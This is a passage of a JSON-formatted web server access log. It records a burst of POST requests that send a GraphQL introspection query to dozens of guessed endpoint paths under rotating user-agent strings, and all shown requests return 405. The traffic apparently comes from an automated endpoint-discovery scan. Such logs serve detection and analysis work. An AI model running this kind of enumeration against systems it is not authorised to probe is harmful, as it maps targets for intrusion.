HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:40 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:40 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:40 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name 